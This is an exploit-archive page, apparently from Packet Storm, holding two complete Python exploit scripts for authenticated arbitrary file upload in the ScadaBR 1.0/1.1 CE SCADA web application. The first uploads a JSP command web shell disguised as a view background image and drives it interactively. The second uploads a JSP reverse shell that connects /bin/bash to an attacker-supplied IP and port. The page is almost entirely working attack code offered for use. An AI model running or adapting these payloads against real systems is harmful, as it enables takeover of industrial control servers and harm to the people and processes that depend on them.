what you don't know can hurt you

ScadaBR 1.0 Shell Upload

ScadaBR 1.0 Shell Upload
Posted Apr 1, 2021
Authored by Fellipe Oliveira

ScadaBR version 1.0 suffers from multiple remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability
MD5 | 8626f1f23af69cc594f9e46083b387d9

ScadaBR 1.0 Shell Upload

Change Mirror Download
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
# Date: 03/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Windows7, Windows10

#!/usr/bin/python

import requests,sys,time


if len(sys.argv) <=4:
print('[x] Missing arguments ... ')
print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>')
print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin')
sys.exit(0)
else:
time.sleep(1)


host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passw = sys.argv[4]

flag = False
LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'


banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Windows Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

def main():
payload = {
'username': user,
'password': passw
}

print(banner)
time.sleep(2)

with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)

print("[+] Trying to authenticate "+LOGIN+"...")
if response.status_code == 200:
print("[+] Successfully authenticated! :D~\n")
time.sleep(2)
else:
print("[x] Authentication failed :(")
sys.exit(0)

burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p;\n if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n }\n else{\n p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n }\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n"
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print('[>] Attempting to upload .jsp Webshell...')
time.sleep(1)
print('[>] Verifying shell upload...\n')
time.sleep(2)

if getdata.status_code == 200:
print('[+] Upload Successfuly!')

for num in range(1,500):
PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
find = s.get(PATH)

if find.status_code == 200:
print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
flag = True
print('[>] Spawning fake shell...')
time.sleep(3)

while flag:
param = raw_input("# ")
burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param)
burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"}
send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '')
print(clean)

elif num == 499:
print('[x] Webshell not Found')

else:
print('Reason:'+getdata.reason+' ')
print('Exploit Failed x_x')


if __name__ == '__main__':
main()


-------------------------------------
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
# Date: 04/21
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Debian9,10~Ubuntu16.04

#!/usr/bin/python

import requests,sys,time


if len(sys.argv) <=6:
print('[x] Missing arguments ... ')
print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')
print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')
sys.exit(0)
else:
time.sleep(1)

host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passw = sys.argv[4]
rev_host = sys.argv[5]
rev_port = sys.argv[6]

flag = False
LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'


banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

def main():
payload = {
'username': user,
'password': passw
}

print(banner)
time.sleep(2)

with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)

print "[+] Trying to authenticate "+LOGIN+"..."
if response.status_code == 200:
print "[+] Successfully authenticated! :D~\n"
time.sleep(2)
else:
print "[x] Authentication failed :("
sys.exit(0)


burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n"
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)


print('[>] Attempting to upload .jsp Webshell...')
time.sleep(1)
print('[>] Verifying shell upload...\n')
time.sleep(2)

if getdata.status_code == 200:
print('[+] Upload Successfuly! \n')

for num in range(1,1000):
PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
find = s.get(PATH)

if find.status_code == 200:
print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
print('[>] Spawning Reverse Shell...\n')
time.sleep(3)

burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port)
burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
time.sleep(5)

if len(r.text) > 401:
print('[+] Connection received')
sys.exit(0)
else:
print('[x] Failed to receive reverse connection ...\n')

elif num == 999:
print('[x] Failed to found Webshell ... ')

else:
print('Reason:'+getdata.reason+' ')
print('Exploit Failed x_x')


if __name__ == '__main__':
main()


Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close